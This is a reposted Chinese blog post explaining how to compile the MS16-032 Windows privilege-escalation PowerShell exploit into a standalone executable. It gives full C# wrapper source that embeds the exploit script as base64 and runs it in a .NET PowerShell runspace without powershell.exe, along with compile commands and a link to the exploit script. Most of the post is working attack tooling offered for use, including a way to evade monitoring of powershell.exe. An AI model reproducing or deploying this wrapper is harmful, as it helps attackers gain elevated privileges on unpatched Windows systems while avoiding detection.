转载

编译你的Powershell( MS16-032为例)

授人以鱼不如授人以渔

之前的MS16-032是个powershell脚本,怎么样改成exe呢,很简单。使用.net直接简单的修改编译就可以了。已经改好的代码在这里:

戳我

gist貌似被墙了,我在这里也贴一下:

/* Author: Evilcg, Twitter: @Evilcg Step One: PS C:/> [psobject].Assembly.Location C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll Step Two: C:/Windows/Microsoft.NET/Framework/v4.0.30319/csc.exe  /reference:"C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs */  // Windows 10 reference may be Here: C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35 using System; using System.IO; using System.Collections.Generic; using System.Collections.ObjectModel; using System.Text; using System.Threading.Tasks; using System.Management.Automation; using System.Management.Automation.Host; using System.Management.Automation.Runspaces;  namespace ConsoleApplication1 {     class Program     {         static string _application;         static string _commandline;         static int Main(string[] args)         {              if (args.Length == 0)             {                 System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe /"/c clac.exe/"");                 return 1;             }              else if (args.Length ==1)             {                  _application = args[0];                          PowerShellExecutor t = new PowerShellExecutor();                 t.ExecuteSynchronously(_application, "");             }             else if(args.Length == 2)             {                 _application = args[0];                 _commandline = args[1];                 PowerShellExecutor t = new PowerShellExecutor();                 t.ExecuteSynchronously(_application, _commandline);             }             return 0;                      }     }      class PowerShellExecutor     {         public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@""));         public void ExecuteSynchronously(string aplication,string commandline)         {             string Commandout;             InitialSessionState iss = InitialSessionState.CreateDefault();             Runspace rs = RunspaceFactory.CreateRunspace(iss);             rs.Open();             PowerShell ps = PowerShell.Create();             ps.Runspace = rs;             ps.AddScript(PSInvoke_MS16_032);             if (commandline != "")             {                  Commandout = "Invoke-MS16-032 -Application /"" + aplication + "/" -Commandline " + "/""+commandline+"/"";             }             else{                  Commandout = "Invoke-MS16-032 -Application " + aplication;             }             Console.WriteLine(Commandout);             ps.AddScript(Commandout);             ps.AddCommand("Out-Default");             ps.Invoke();             rs.Close();         }     } } 

base64的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 的所有内容的base64编码(你可以使用你自己的powershell脚本),由于我改的这个是有参数的,所以简单的写了上面的c#代码,通过.net来执行powershell。

编译需要System.Management.Automation.dll,具体步骤在cs文件里面已经写了,你们自己编译吧,只是对本机进行了测试,没测试别的,测试Demo如下:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过.net来执行powershell,并不需要powershell.exe 。详情可以看一下 [link href="https://github.com/Cn33liz/p0wnedShell"]p0wnedShell[/link] 或者 http://zone.wooyun.org/content/26831

原文  http://evi1cg.me/archives/Compile_Your_Powreshell_Script.html
正文到此结束
Loading...